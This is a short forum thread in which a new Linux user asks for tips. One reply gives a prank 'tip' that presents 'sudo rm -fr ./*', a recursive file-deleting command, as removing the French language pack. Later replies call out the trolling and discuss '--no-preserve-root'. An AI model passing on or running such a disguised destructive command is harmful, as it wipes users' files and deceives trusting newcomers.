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I just started using Linux... any great tips?
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Linux tips 1: Always remove the french language pack: sudo rm -fr ./*
Ok the joke is funny but you gotta tell new guys it's sarcastic. Down voting for that only. OP is asking genuine advice, trolling like this hurts users switching to Linux and they may just go back.
I agree that was inappropriate, but it won't work, on newer versions you have to pass
--no-preserve-root
to rm if you want to delete /Agreed but still all the user data is gone. Including default user profile. Then user has to figure out how to make things normal again.